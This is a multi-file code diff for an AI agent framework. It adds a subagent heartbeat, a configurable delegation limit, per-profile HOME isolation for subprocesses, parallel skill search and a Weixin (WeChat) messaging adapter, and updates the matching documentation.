"using default %d", val, _DEFAULT_MAX_CONCURRENT_CHILDREN,
)
env_val = os.getenv("DELEGATION_MAX_CONCURRENT_CHILDREN")
if env_val:
try:
return max(1, int(env_val))
except (TypeError, ValueError):
pass
return _DEFAULT_MAX_CONCURRENT_CHILDREN
DEFAULT_MAX_ITERATIONS = 50
_HEARTBEAT_INTERVAL = 30 # seconds between parent activity heartbeats during delegation
DEFAULT_TOOLSETS = ["terminal", "file", "web"]
@@ -369,6 +397,44 @@ def _run_single_child(
except Exception as exc:
logger.debug("Failed to bind child to leased credential: %s", exc)
# Heartbeat: periodically propagate child activity to the parent so the
# gateway inactivity timeout doesn't fire while the subagent is working.
# Without this, the parent's _last_activity_ts freezes when delegate_task
# starts and the gateway eventually kills the agent for "no activity".
_heartbeat_stop = threading.Event()
def _heartbeat_loop():
while not _heartbeat_stop.wait(_HEARTBEAT_INTERVAL):
if parent_agent is None:
continue
touch = getattr(parent_agent, '_touch_activity', None)
if not touch:
continue
# Pull detail from the child's own activity tracker
desc = f"delegate_task: subagent {task_index} working"
try:
child_summary = child.get_activity_summary()
child_tool = child_summary.get("current_tool")
child_iter = child_summary.get("api_call_count", 0)
child_max = child_summary.get("max_iterations", 0)
if child_tool:
desc = (f"delegate_task: subagent running {child_tool} "
f"(iteration {child_iter}/{child_max})")
else:
child_desc = child_summary.get("last_activity_desc", "")
if child_desc:
desc = (f"delegate_task: subagent {child_desc} "
f"(iteration {child_iter}/{child_max})")
except Exception:
pass
try:
touch(desc)
except Exception:
pass
_heartbeat_thread = threading.Thread(target=_heartbeat_loop, daemon=True)
_heartbeat_thread.start()
try:
result = child.run_conversation(user_message=goal)
@@ -479,6 +545,11 @@ def _run_single_child(
}
finally:
# Stop the heartbeat thread so it doesn't keep touching parent activity
# after the child has finished (or failed).
_heartbeat_stop.set()
_heartbeat_thread.join(timeout=5)
if child_pool is not None and leased_cred_id is not None:
try:
child_pool.release_lease(leased_cred_id)
@@ -555,8 +626,17 @@ def delegate_task(
return tool_error(str(exc))
# Normalize to task list
max_children = _get_max_concurrent_children()
if tasks and isinstance(tasks, list):
task_list = tasks[:MAX_CONCURRENT_CHILDREN]
if len(tasks) > max_children:
return tool_error(
f"Too many tasks: {len(tasks)} provided, but "
f"max_concurrent_children is {max_children}. "
f"Either reduce the task count, split into multiple "
f"delegate_task calls, or increase "
f"delegation.max_concurrent_children in config.yaml."
)
task_list = tasks
elif goal and isinstance(goal, str) and goal.strip():
task_list = [{"goal": goal, "context": context, "toolsets": toolsets}]
else:
@@ -616,7 +696,7 @@ def delegate_task(
completed_count = 0
spinner_ref = getattr(parent_agent, '_delegate_spinner', None)
with ThreadPoolExecutor(max_workers=MAX_CONCURRENT_CHILDREN) as executor:
with ThreadPoolExecutor(max_workers=max_children) as executor:
futures = {}
for i, t, child in children:
future = executor.submit(
@@ -920,9 +1000,11 @@ DELEGATE_TASK_SCHEMA = {
},
"required": ["goal"],
},
"maxItems": 3,
# No maxItems — the runtime limit is configurable via
# delegation.max_concurrent_children (default 3) and
# enforced with a clear error in delegate_task().
"description": (
"Batch mode: up to 3 tasks to run in parallel. Each gets "
"Batch mode: tasks to run in parallel (limit configurable via delegation.max_concurrent_children, default 3). Each gets "
"its own subagent with isolated context and terminal session. "
"When provided, top-level goal/context/toolsets are ignored."
),
+15
View File
@@ -129,6 +129,12 @@ def _sanitize_subprocess_env(base_env: dict | None, extra_env: dict | None = Non
elif key not in _HERMES_PROVIDER_ENV_BLOCKLIST or _is_passthrough(key):
sanitized[key] = value
# Per-profile HOME isolation for background processes (same as _make_run_env).
from hermes_constants import get_subprocess_home
_profile_home = get_subprocess_home()
if _profile_home:
sanitized["HOME"] = _profile_home
return sanitized
@@ -195,6 +201,15 @@ def _make_run_env(env: dict) -> dict:
existing_path = run_env.get("PATH", "")
if "/usr/bin" not in existing_path.split(":"):
run_env["PATH"] = f"{existing_path}:{_SANE_PATH}" if existing_path else _SANE_PATH
# Per-profile HOME isolation: redirect system tool configs (git, ssh, gh,
# npm …) into {HERMES_HOME}/home/ when that directory exists. Only the
# subprocess sees the override — the Python process keeps the real HOME.
from hermes_constants import get_subprocess_home
_profile_home = get_subprocess_home()
if _profile_home:
run_env["HOME"] = _profile_home
return run_env
+31
View File
@@ -18,6 +18,7 @@ logger = logging.getLogger(__name__)
_TELEGRAM_TOPIC_TARGET_RE = re.compile(r"^\s*(-?\d+)(?::(\d+))?\s*$")
_FEISHU_TARGET_RE = re.compile(r"^\s*((?:oc|ou|on|chat|open)_[-A-Za-z0-9]+)(?::([-A-Za-z0-9_]+))?\s*$")
_WEIXIN_TARGET_RE = re.compile(r"^\s*((?:wxid|gh|v\d+|wm|wb)_[A-Za-z0-9_-]+|[A-Za-z0-9._-]+@chatroom|filehelper)\s*$")
# Discord snowflake IDs are numeric, same regex pattern as Telegram topic targets.
_NUMERIC_TOPIC_RE = _TELEGRAM_TOPIC_TARGET_RE
_IMAGE_EXTS = {".jpg", ".jpeg", ".png", ".webp", ".gif"}
@@ -157,6 +158,7 @@ def _handle_send(args):
"dingtalk": Platform.DINGTALK,
"feishu": Platform.FEISHU,
"wecom": Platform.WECOM,
"weixin": Platform.WEIXIN,
"email": Platform.EMAIL,
"sms": Platform.SMS,
}
@@ -237,6 +239,10 @@ def _parse_target_ref(platform_name: str, target_ref: str):
match = _NUMERIC_TOPIC_RE.fullmatch(target_ref)
if match:
return match.group(1), match.group(2), True
if platform_name == "weixin":
match = _WEIXIN_TARGET_RE.fullmatch(target_ref)
if match:
return match.group(1), None, True
if target_ref.lstrip("-").isdigit():
return target_ref, None, True
return None, None, False
@@ -369,6 +375,10 @@ async def _send_to_platform(platform, pconfig, chat_id, message, thread_id=None,
last_result = result
return last_result
# --- Weixin: use the native one-shot adapter helper for text + media ---
if platform == Platform.WEIXIN:
return await _send_weixin(pconfig, chat_id, message, media_files=media_files)
# --- Non-Telegram platforms ---
if media_files and not message.strip():
return {
@@ -903,6 +913,27 @@ async def _send_wecom(extra, chat_id, message):
return _error(f"WeCom send failed: {e}")
async def _send_weixin(pconfig, chat_id, message, media_files=None):
"""Send via Weixin iLink using the native adapter helper."""
try:
from gateway.platforms.weixin import check_weixin_requirements, send_weixin_direct
if not check_weixin_requirements():
return {"error": "Weixin requirements not met. Need aiohttp + cryptography."}
except ImportError:
return {"error": "Weixin adapter not available."}
try:
return await send_weixin_direct(
extra=pconfig.extra,
token=pconfig.token,
chat_id=chat_id,
message=message,
media_files=media_files,
)
except Exception as e:
return _error(f"Weixin send failed: {e}")
async def _send_bluebubbles(extra, chat_id, message):
"""Send via BlueBubbles iMessage server using the adapter's REST API."""
try:
+81 -11
View File
@@ -2675,19 +2675,89 @@ def create_source_router(auth: Optional[GitHubAuth] = None) -> List[SkillSource]
return sources
def _search_one_source(
src: SkillSource, query: str, limit: int
) -> Tuple[str, List[SkillMeta]]:
"""Search a single source. Runs in a thread for parallelism."""
try:
return src.source_id(), src.search(query, limit=limit)
except Exception as e:
logger.debug("Search failed for %s: %s", src.source_id(), e)
return src.source_id(), []
def parallel_search_sources(
sources: List[SkillSource],
query: str = "",
per_source_limits: Optional[Dict[str, int]] = None,
source_filter: str = "all",
overall_timeout: float = 30,
on_source_done: Optional[Any] = None,
) -> Tuple[List[SkillMeta], Dict[str, int], List[str]]:
"""Search all sources in parallel with per-source timeout.
Returns ``(all_results, source_counts, timed_out_ids)``.
*on_source_done* is an optional callback ``(source_id, count) -> None``
invoked as each source completes useful for progress indicators.
"""
from concurrent.futures import ThreadPoolExecutor, as_completed
per_source_limits = per_source_limits or {}
active: List[SkillSource] = []
for src in sources:
sid = src.source_id()
if source_filter != "all" and sid != source_filter and sid != "official":
continue
active.append(src)
all_results: List[SkillMeta] = []
source_counts: Dict[str, int] = {}
timed_out_ids: List[str] = []
if not active:
return all_results, source_counts, timed_out_ids
with ThreadPoolExecutor(max_workers=min(len(active), 8)) as pool:
futures = {}
for src in active:
lim = per_source_limits.get(src.source_id(), 50)
fut = pool.submit(_search_one_source, src, query, lim)
futures[fut] = src.source_id()
try:
for fut in as_completed(futures, timeout=overall_timeout):
try:
sid, results = fut.result(timeout=0)
source_counts[sid] = len(results)
all_results.extend(results)
if on_source_done:
on_source_done(sid, len(results))
except Exception:
pass
except TimeoutError:
timed_out_ids = [
futures[f] for f in futures if not f.done()
]
if timed_out_ids:
logger.debug(
"Skills browse timed out waiting for: %s",
", ".join(timed_out_ids),
)
return all_results, source_counts, timed_out_ids
def unified_search(query: str, sources: List[SkillSource],
source_filter: str = "all", limit: int = 10) -> List[SkillMeta]:
"""Search all sources and merge results."""
all_results: List[SkillMeta] = []
for src in sources:
if source_filter != "all" and src.source_id() != source_filter:
continue
try:
results = src.search(query, limit=limit)
all_results.extend(results)
except Exception as e:
logger.debug(f"Search failed for {src.source_id()}: {e}")
"""Search all sources (in parallel) and merge results."""
all_results, _, _ = parallel_search_sources(
sources,
query=query,
source_filter=source_filter,
overall_timeout=30,
)
# Deduplicate by name, preferring higher trust levels
_TRUST_RANK = {"builtin": 2, "trusted": 1, "community": 0}
+7 -1
View File
@@ -353,6 +353,12 @@ TOOLSETS = {
"includes": []
},
"hermes-weixin": {
"description": "Weixin bot toolset - personal WeChat messaging via iLink (full access)",
"tools": _HERMES_CORE_TOOLS,
"includes": []
},
"hermes-wecom": {
"description": "WeCom bot toolset - enterprise WeChat messaging (full access)",
"tools": _HERMES_CORE_TOOLS,
@@ -374,7 +380,7 @@ TOOLSETS = {
"hermes-gateway": {
"description": "Gateway toolset - union of all messaging platform tools",
"tools": [],
"includes": ["hermes-telegram", "hermes-discord", "hermes-whatsapp", "hermes-slack", "hermes-signal", "hermes-bluebubbles", "hermes-homeassistant", "hermes-email", "hermes-sms", "hermes-mattermost", "hermes-matrix", "hermes-dingtalk", "hermes-feishu", "hermes-wecom", "hermes-webhook"]
"includes": ["hermes-telegram", "hermes-discord", "hermes-whatsapp", "hermes-slack", "hermes-signal", "hermes-bluebubbles", "hermes-homeassistant", "hermes-email", "hermes-sms", "hermes-mattermost", "hermes-matrix", "hermes-dingtalk", "hermes-feishu", "hermes-wecom", "hermes-weixin", "hermes-webhook"]
}
}
+1 -1
View File
@@ -118,7 +118,7 @@ hermes-agent/
│ ├── builtin_hooks/ # Always-registered hooks
│ └── platforms/ # 15 adapters: telegram, discord, slack, whatsapp,
│ # signal, matrix, mattermost, email, sms,
│ # dingtalk, feishu, wecom, bluebubbles, homeassistant, webhook
│ # dingtalk, feishu, wecom, weixin, bluebubbles, homeassistant, webhook
├── acp_adapter/ # ACP server (VS Code / Zed / JetBrains)
├── cron/ # Scheduler (jobs.py, scheduler.py)
@@ -169,6 +169,7 @@ Cron job results can be delivered to any supported platform:
| DingTalk | `dingtalk` | Deliver to DingTalk |
| Feishu | `feishu` | Deliver to Feishu |
| WeCom | `wecom` | Deliver to WeCom |
| Weixin | `weixin` | Deliver to Weixin (WeChat) |
| BlueBubbles | `bluebubbles` | Deliver to iMessage via BlueBubbles |
For Telegram topics, use the format `telegram:<chat_id>:<thread_id>` (e.g., `telegram:-1001234567890:17585`).
@@ -160,6 +160,7 @@ gateway/platforms/
├── dingtalk.py # DingTalk WebSocket
├── feishu.py # Feishu/Lark WebSocket or webhook
├── wecom.py # WeCom (WeChat Work) callback
├── weixin.py # Weixin (personal WeChat) via iLink Bot API
├── bluebubbles.py # Apple iMessage via BlueBubbles macOS server
├── webhook.py # Inbound/outbound webhook adapter
├── api_server.py # REST API server adapter
+1 -1
View File
@@ -70,7 +70,7 @@ Delivery targets are case-sensitive and require the correct platform to be confi
| `local` | Write access to `~/.hermes/cron/output/` |
| `origin` | Delivers to the chat where the job was created |
Other supported platforms include `mattermost`, `homeassistant`, `dingtalk`, `feishu`, `wecom`, `bluebubbles`, and `webhook`. You can also target a specific chat with `platform:chat_id` syntax (e.g., `telegram:-1001234567890`).
Other supported platforms include `mattermost`, `homeassistant`, `dingtalk`, `feishu`, `wecom`, `weixin`, `bluebubbles`, and `webhook`. You can also target a specific chat with `platform:chat_id` syntax (e.g., `telegram:-1001234567890`).
If delivery fails, the job still runs — it just won't send anywhere. Check `hermes cron list` for updated `last_error` field (if available).
+1 -1
View File
@@ -82,7 +82,7 @@ Speech-to-text supports three providers: local Whisper (free, runs on-device), G
Hermes runs as a gateway bot on 15+ messaging platforms, all configured through the same `gateway` subsystem:
- **[Telegram](/docs/user-guide/messaging/telegram)**, **[Discord](/docs/user-guide/messaging/discord)**, **[Slack](/docs/user-guide/messaging/slack)**, **[WhatsApp](/docs/user-guide/messaging/whatsapp)**, **[Signal](/docs/user-guide/messaging/signal)**, **[Matrix](/docs/user-guide/messaging/matrix)**, **[Mattermost](/docs/user-guide/messaging/mattermost)**, **[Email](/docs/user-guide/messaging/email)**, **[SMS](/docs/user-guide/messaging/sms)**, **[DingTalk](/docs/user-guide/messaging/dingtalk)**, **[Feishu/Lark](/docs/user-guide/messaging/feishu)**, **[WeCom](/docs/user-guide/messaging/wecom)**, **[BlueBubbles](/docs/user-guide/messaging/bluebubbles)**, **[Home Assistant](/docs/user-guide/messaging/homeassistant)**, **[Webhooks](/docs/user-guide/messaging/webhooks)**
- **[Telegram](/docs/user-guide/messaging/telegram)**, **[Discord](/docs/user-guide/messaging/discord)**, **[Slack](/docs/user-guide/messaging/slack)**, **[WhatsApp](/docs/user-guide/messaging/whatsapp)**, **[Signal](/docs/user-guide/messaging/signal)**, **[Matrix](/docs/user-guide/messaging/matrix)**, **[Mattermost](/docs/user-guide/messaging/mattermost)**, **[Email](/docs/user-guide/messaging/email)**, **[SMS](/docs/user-guide/messaging/sms)**, **[DingTalk](/docs/user-guide/messaging/dingtalk)**, **[Feishu/Lark](/docs/user-guide/messaging/feishu)**, **[WeCom](/docs/user-guide/messaging/wecom)**, **[Weixin](/docs/user-guide/messaging/weixin)**, **[BlueBubbles](/docs/user-guide/messaging/bluebubbles)**, **[Home Assistant](/docs/user-guide/messaging/homeassistant)**, **[Webhooks](/docs/user-guide/messaging/webhooks)**
See the [Messaging Gateway overview](/docs/user-guide/messaging) for the platform comparison table and setup guide.
@@ -227,6 +227,17 @@ For cloud sandbox backends, persistence is filesystem-oriented. `TERMINAL_LIFETI
| `WECOM_WEBSOCKET_URL` | Custom WebSocket URL (default: `wss://openws.work.weixin.qq.com`) |
| `WECOM_ALLOWED_USERS` | Comma-separated WeCom user IDs allowed to message the bot |
| `WECOM_HOME_CHANNEL` | WeCom chat ID for cron delivery and notifications |
| `WEIXIN_ACCOUNT_ID` | Weixin account ID obtained via QR login through iLink Bot API |
| `WEIXIN_TOKEN` | Weixin authentication token obtained via QR login through iLink Bot API |
| `WEIXIN_BASE_URL` | Override Weixin iLink Bot API base URL (default: `https://ilinkai.weixin.qq.com`) |
| `WEIXIN_CDN_BASE_URL` | Override Weixin CDN base URL for media (default: `https://novac2c.cdn.weixin.qq.com/c2c`) |
| `WEIXIN_DM_POLICY` | Direct message policy: `open`, `allowlist`, `pairing`, `disabled` (default: `open`) |
| `WEIXIN_GROUP_POLICY` | Group message policy: `open`, `allowlist`, `disabled` (default: `disabled`) |
| `WEIXIN_ALLOWED_USERS` | Comma-separated Weixin user IDs allowed to DM the bot |
| `WEIXIN_GROUP_ALLOWED_USERS` | Comma-separated Weixin group IDs allowed to interact with the bot |
| `WEIXIN_HOME_CHANNEL` | Weixin chat ID for cron delivery and notifications |
| `WEIXIN_HOME_CHANNEL_NAME` | Display name for the Weixin home channel |
| `WEIXIN_ALLOW_ALL_USERS` | Allow all Weixin users without an allowlist (`true`/`false`) |
| `BLUEBUBBLES_SERVER_URL` | BlueBubbles server URL (e.g. `http://192.168.1.10:1234`) |
| `BLUEBUBBLES_PASSWORD` | BlueBubbles server password |
| `BLUEBUBBLES_WEBHOOK_HOST` | Webhook listener bind address (default: `127.0.0.1`) |
@@ -257,10 +268,10 @@ For cloud sandbox backends, persistence is filesystem-oriented. `TERMINAL_LIFETI
| `WEBHOOK_PORT` | HTTP server port for receiving webhooks (default: `8644`) |
| `WEBHOOK_SECRET` | Global HMAC secret for webhook signature validation (used as fallback when routes don't specify their own) |
| `API_SERVER_ENABLED` | Enable the OpenAI-compatible API server (`true`/`false`). Runs alongside other platforms. |
| `API_SERVER_KEY` | Bearer token for API server authentication. Strongly recommended; required for any network-accessible deployment. |
| `API_SERVER_KEY` | Bearer token for API server authentication. Enforced for non-loopback binding. |
| `API_SERVER_CORS_ORIGINS` | Comma-separated browser origins allowed to call the API server directly (for example `http://localhost:3000,http://127.0.0.1:3000`). Default: disabled. |
| `API_SERVER_PORT` | Port for the API server (default: `8642`) |
| `API_SERVER_HOST` | Host/bind address for the API server (default: `127.0.0.1`). Use `0.0.0.0` for network access only with `API_SERVER_KEY` and a narrow `API_SERVER_CORS_ORIGINS` allowlist. |
| `API_SERVER_HOST` | Host/bind address for the API server (default: `127.0.0.1`). Use `0.0.0.0` for network access — requires `API_SERVER_KEY` and a narrow `API_SERVER_CORS_ORIGINS` allowlist. |
| `API_SERVER_MODEL_NAME` | Model name advertised on `/v1/models`. Defaults to the profile name (or `hermes-agent` for the default profile). Useful for multi-user setups where frontends like Open WebUI need distinct model names per connection. |
| `MESSAGING_CWD` | Working directory for terminal commands in messaging mode (default: `~`) |
| `GATEWAY_ALLOWED_USERS` | Comma-separated user IDs allowed across all platforms |
@@ -103,6 +103,7 @@ Platform toolsets define the complete tool configuration for a deployment target
| `hermes-dingtalk` | Same as `hermes-cli`. |
| `hermes-feishu` | Same as `hermes-cli`. |
| `hermes-wecom` | Same as `hermes-cli`. |
| `hermes-weixin` | Same as `hermes-cli`. |
| `hermes-bluebubbles` | Same as `hermes-cli`. |
| `hermes-homeassistant` | Same as `hermes-cli`. |
| `hermes-webhook` | Same as `hermes-cli`. |
+1 -1
View File
@@ -857,7 +857,7 @@ display:
slack: 'off' # quiet in shared Slack workspace
```
Platforms without an override fall back to the global `tool_progress` value. Valid platform keys: `telegram`, `discord`, `slack`, `signal`, `whatsapp`, `matrix`, `mattermost`, `email`, `sms`, `homeassistant`, `dingtalk`, `feishu`, `wecom`, `bluebubbles`.
Platforms without an override fall back to the global `tool_progress` value. Valid platform keys: `telegram`, `discord`, `slack`, `signal`, `whatsapp`, `matrix`, `mattermost`, `email`, `sms`, `homeassistant`, `dingtalk`, `feishu`, `wecom`, `weixin`, `bluebubbles`.
## Privacy
@@ -177,7 +177,7 @@ Authorization: Bearer ***
Configure the key via `API_SERVER_KEY` env var. If you need a browser to call Hermes directly, also set `API_SERVER_CORS_ORIGINS` to an explicit allowlist.
:::warning Security
The API server gives full access to hermes-agent's toolset, **including terminal commands**. If you change the bind address to `0.0.0.0` (network-accessible), **always set `API_SERVER_KEY`** and keep `API_SERVER_CORS_ORIGINS` narrow — without that, remote callers may be able to execute arbitrary commands on your machine.
The API server gives full access to hermes-agent's toolset, **including terminal commands**. When binding to a non-loopback address like `0.0.0.0`, `API_SERVER_KEY` is **required**. Also keep `API_SERVER_CORS_ORIGINS` narrow to control browser access.
The default bind address (`127.0.0.1`) is for local-only use. Browser access is disabled by default; enable it only for explicit trusted origins.
:::
+1
View File
@@ -202,6 +202,7 @@ When scheduling jobs, you specify where the output goes:
| `"dingtalk"` | DingTalk | |
| `"feishu"` | Feishu/Lark | |
| `"wecom"` | WeCom | |
| `"weixin"` | Weixin (WeChat) | |
| `"bluebubbles"` | BlueBubbles (iMessage) | |
The agent's final response is automatically delivered. You do not need to call `send_message` in the cron prompt.
+9 -1
View File
@@ -6,7 +6,7 @@ description: "Chat with Hermes from Telegram, Discord, Slack, WhatsApp, Signal,
# Messaging Gateway
Chat with Hermes from Telegram, Discord, Slack, WhatsApp, Signal, SMS, Email, Home Assistant, Mattermost, Matrix, DingTalk, Feishu/Lark, WeCom, BlueBubbles (iMessage), or your browser. The gateway is a single background process that connects to all your configured platforms, handles sessions, runs cron jobs, and delivers voice messages.
Chat with Hermes from Telegram, Discord, Slack, WhatsApp, Signal, SMS, Email, Home Assistant, Mattermost, Matrix, DingTalk, Feishu/Lark, WeCom, Weixin, BlueBubbles (iMessage), or your browser. The gateway is a single background process that connects to all your configured platforms, handles sessions, runs cron jobs, and delivers voice messages.
For the full voice feature set — including CLI microphone mode, spoken replies in messaging, and Discord voice-channel conversations — see [Voice Mode](/docs/user-guide/features/voice-mode) and [Use Voice Mode with Hermes](/docs/guides/use-voice-mode-with-hermes).
@@ -27,6 +27,7 @@ For the full voice feature set — including CLI microphone mode, spoken replies
| DingTalk | — | — | — | — | — | ✅ | ✅ |
| Feishu/Lark | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ |
| WeCom | ✅ | ✅ | ✅ | — | — | ✅ | ✅ |
| Weixin | ✅ | ✅ | ✅ | — | — | ✅ | ✅ |
| BlueBubbles | — | ✅ | ✅ | — | ✅ | ✅ | — |
**Voice** = TTS audio replies and/or voice message transcription. **Images** = send/receive images. **Files** = send/receive file attachments. **Threads** = threaded conversations. **Reactions** = emoji reactions on messages. **Typing** = typing indicator while processing. **Streaming** = progressive message updates via editing.
@@ -50,6 +51,7 @@ flowchart TB
dt[DingTalk]
fs[Feishu/Lark]
wc[WeCom]
wx[Weixin]
bb[BlueBubbles]
api["API Server<br/>(OpenAI-compatible)"]
wh[Webhooks]
@@ -71,6 +73,10 @@ flowchart TB
mm --> store
mx --> store
dt --> store
fs --> store
wc --> store
wx --> store
bb --> store
api --> store
wh --> store
store --> agent
@@ -354,6 +360,7 @@ Each platform has its own toolset:
| DingTalk | `hermes-dingtalk` | Full tools including terminal |
| Feishu/Lark | `hermes-feishu` | Full tools including terminal |
| WeCom | `hermes-wecom` | Full tools including terminal |
| Weixin | `hermes-weixin` | Full tools including terminal |
| BlueBubbles | `hermes-bluebubbles` | Full tools including terminal |
| API Server | `hermes` (default) | Full tools including terminal |
| Webhooks | `hermes-webhook` | Full tools including terminal |
@@ -373,6 +380,7 @@ Each platform has its own toolset:
- [DingTalk Setup](dingtalk.md)
- [Feishu/Lark Setup](feishu.md)
- [WeCom Setup](wecom.md)
- [Weixin Setup (WeChat)](weixin.md)
- [BlueBubbles Setup (iMessage)](bluebubbles.md)
- [Open WebUI + API Server](open-webui.md)
- [Webhooks](webhooks.md)
@@ -70,7 +70,7 @@ Routes define how different webhook sources are handled. Each route is a named e
| `secret` | **Yes** | HMAC secret for signature validation. Falls back to the global `secret` if not set on the route. Set to `"INSECURE_NO_AUTH"` for testing only (skips validation). |
| `prompt` | No | Template string with dot-notation payload access (e.g. `{pull_request.title}`). If omitted, the full JSON payload is dumped into the prompt. |
| `skills` | No | List of skill names to load for the agent run. |
| `deliver` | No | Where to send the response: `github_comment`, `telegram`, `discord`, `slack`, `signal`, `sms`, `whatsapp`, `matrix`, `mattermost`, `homeassistant`, `email`, `dingtalk`, `feishu`, `wecom`, `bluebubbles`, or `log` (default). |
| `deliver` | No | Where to send the response: `github_comment`, `telegram`, `discord`, `slack`, `signal`, `sms`, `whatsapp`, `matrix`, `mattermost`, `homeassistant`, `email`, `dingtalk`, `feishu`, `wecom`, `weixin`, `bluebubbles`, or `log` (default). |
| `deliver_extra` | No | Additional delivery config — keys depend on `deliver` type (e.g. `repo`, `pr_number`, `chat_id`). Values support the same `{dot.notation}` templates as `prompt`. |
### Full example
@@ -233,6 +233,7 @@ The `deliver` field controls where the agent's response goes after processing th
| `dingtalk` | Routes the response to DingTalk. Uses the home channel, or specify `chat_id` in `deliver_extra`. |
| `feishu` | Routes the response to Feishu/Lark. Uses the home channel, or specify `chat_id` in `deliver_extra`. |
| `wecom` | Routes the response to WeCom. Uses the home channel, or specify `chat_id` in `deliver_extra`. |
| `weixin` | Routes the response to Weixin (WeChat). Uses the home channel, or specify `chat_id` in `deliver_extra`. |
| `bluebubbles` | Routes the response to BlueBubbles (iMessage). Uses the home channel, or specify `chat_id` in `deliver_extra`. |
For cross-platform delivery, the target platform must also be enabled and connected in the gateway. If no `chat_id` is provided in `deliver_extra`, the response is sent to that platform's configured home channel.
+294
View File
@@ -0,0 +1,294 @@
---
sidebar_position: 15
title: "Weixin (WeChat)"
description: "Connect Hermes Agent to personal WeChat accounts via the iLink Bot API"
---
# Weixin (WeChat)
Connect Hermes to [WeChat](https://weixin.qq.com/) (微信), Tencent's personal messaging platform. The adapter uses Tencent's **iLink Bot API** for personal WeChat accounts — this is distinct from WeCom (Enterprise WeChat). Messages are delivered via long-polling, so no public endpoint or webhook is required.
:::info
This adapter is for **personal WeChat accounts** (微信). If you need enterprise/corporate WeChat, see the [WeCom adapter](./wecom.md) instead.
:::
## Prerequisites
- A personal WeChat account
- Python packages: `aiohttp` and `cryptography`
- The `qrcode` package is optional (for terminal QR rendering during setup)
Install the required dependencies:
```bash
pip install aiohttp cryptography
# Optional: for terminal QR code display
pip install qrcode
```
## Setup
### 1. Run the Setup Wizard
The easiest way to connect your WeChat account is through the interactive setup:
```bash
hermes gateway setup
```
Select **Weixin** when prompted. The wizard will:
1. Request a QR code from the iLink Bot API
2. Display the QR code in your terminal (or provide a URL)
3. Wait for you to scan the QR code with the WeChat mobile app
4. Prompt you to confirm the login on your phone
5. Save the account credentials automatically to `~/.hermes/weixin/accounts/`
Once confirmed, you'll see a message like:
```
微信连接成功,account_id=your-account-id
```
The wizard stores the `account_id`, `token`, and `base_url` so you don't need to configure them manually.
### 2. Configure Environment Variables
After initial QR login, set at minimum the account ID in `~/.hermes/.env`:
```bash
WEIXIN_ACCOUNT_ID=your-account-id
# Optional: override the token (normally auto-saved from QR login)
# WEIXIN_TOKEN=your-bot-token
# Optional: restrict access
WEIXIN_DM_POLICY=open
WEIXIN_ALLOWED_USERS=user_id_1,user_id_2
# Optional: home channel for cron/notifications
WEIXIN_HOME_CHANNEL=chat_id
WEIXIN_HOME_CHANNEL_NAME=Home
```
### 3. Start the Gateway
```bash
hermes gateway
```
The adapter will restore saved credentials, connect to the iLink API, and begin long-polling for messages.
## Features
- **Long-poll transport** — no public endpoint, webhook, or WebSocket needed
- **QR code login** — scan-to-connect setup via `hermes gateway setup`
- **DM and group messaging** — configurable access policies
- **Media support** — images, video, files, and voice messages
- **AES-128-ECB encrypted CDN** — automatic encryption/decryption for all media transfers
- **Context token persistence** — disk-backed reply continuity across restarts
- **Markdown formatting** — headers, tables, and code blocks are reformatted for WeChat readability
- **Smart message chunking** — long messages are split at logical boundaries (paragraphs, code fences)
- **Typing indicators** — shows "typing…" status in the WeChat client while the agent processes
- **SSRF protection** — outbound media URLs are validated before download
- **Message deduplication** — 5-minute sliding window prevents double-processing
- **Automatic retry with backoff** — recovers from transient API errors
## Configuration Options
Set these in `config.yaml` under `platforms.weixin.extra`:
| Key | Default | Description |
|-----|---------|-------------|
| `account_id` | — | iLink Bot account ID (required) |
| `token` | — | iLink Bot token (required, auto-saved from QR login) |
| `base_url` | `https://ilinkai.weixin.qq.com` | iLink API base URL |
| `cdn_base_url` | `https://novac2c.cdn.weixin.qq.com/c2c` | CDN base URL for media transfer |
| `dm_policy` | `open` | DM access: `open`, `allowlist`, `disabled`, `pairing` |
| `group_policy` | `disabled` | Group access: `open`, `allowlist`, `disabled` |
| `allow_from` | `[]` | User IDs allowed for DMs (when dm_policy=allowlist) |
| `group_allow_from` | `[]` | Group IDs allowed (when group_policy=allowlist) |
## Access Policies
### DM Policy
Controls who can send direct messages to the bot:
| Value | Behavior |
|-------|----------|
| `open` | Anyone can DM the bot (default) |
| `allowlist` | Only user IDs in `allow_from` can DM |
| `disabled` | All DMs are ignored |
| `pairing` | Pairing mode (for initial setup) |
```bash
WEIXIN_DM_POLICY=allowlist
WEIXIN_ALLOWED_USERS=user_id_1,user_id_2
```
### Group Policy
Controls which groups the bot responds in:
| Value | Behavior |
|-------|----------|
| `open` | Bot responds in all groups |
| `allowlist` | Bot only responds in group IDs listed in `group_allow_from` |
| `disabled` | All group messages are ignored (default) |
```bash
WEIXIN_GROUP_POLICY=allowlist
WEIXIN_GROUP_ALLOWED_USERS=group_id_1,group_id_2
```
:::note
The default group policy is `disabled` for Weixin (unlike WeCom where it defaults to `open`). This is intentional since personal WeChat accounts may be in many groups.
:::
## Media Support
### Inbound (receiving)
The adapter receives media attachments from users, downloads them from the WeChat CDN, decrypts them, and caches them locally for agent processing:
| Type | How it's handled |
|------|-----------------|
| **Images** | Downloaded, AES-decrypted, and cached as JPEG. |
| **Video** | Downloaded, AES-decrypted, and cached as MP4. |
| **Files** | Downloaded, AES-decrypted, and cached. Original filename is preserved. |
| **Voice** | If a text transcription is available, it's extracted as text. Otherwise the audio (SILK format) is downloaded and cached. |
**Quoted messages:** Media from quoted (replied-to) messages is also extracted, so the agent has context about what the user is replying to.
### AES-128-ECB Encrypted CDN
WeChat media files are transferred through an encrypted CDN. The adapter handles this transparently:
- **Inbound:** Encrypted media is downloaded from the CDN using `encrypted_query_param` URLs, then decrypted with AES-128-ECB using the per-file key provided in the message payload.
- **Outbound:** Files are encrypted locally with a random AES-128-ECB key, uploaded to the CDN, and the encrypted reference is included in the outbound message.
- The AES key is 16 bytes (128-bit). Keys may arrive as raw base64 or hex-encoded — the adapter handles both formats.
- This requires the `cryptography` Python package.
No configuration is needed — encryption and decryption happen automatically.
### Outbound (sending)
| Method | What it sends |
|--------|--------------|
| `send` | Text messages with Markdown formatting |
| `send_image` / `send_image_file` | Native image messages (via CDN upload) |
| `send_document` | File attachments (via CDN upload) |
| `send_video` | Video messages (via CDN upload) |
All outbound media goes through the encrypted CDN upload flow:
1. Generate a random AES-128 key
2. Encrypt the file with AES-128-ECB + PKCS#7 padding
3. Request an upload URL from the iLink API (`getuploadurl`)
4. Upload the ciphertext to the CDN
5. Send the message with the encrypted media reference
## Context Token Persistence
